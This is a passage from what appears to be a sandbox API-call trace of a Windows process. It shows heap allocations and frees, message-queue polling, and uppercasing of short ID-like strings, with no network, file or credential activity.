lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0088.255] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0088.256] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0088.256] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e00 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0088.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0088.257] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0088.257] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.257] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0088.258] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0088.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0088.260] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0088.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0088.260] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0088.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0088.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0088.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.261] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0088.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0088.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0088.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.265] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.265] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0088.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.266] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0088.266] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.267] 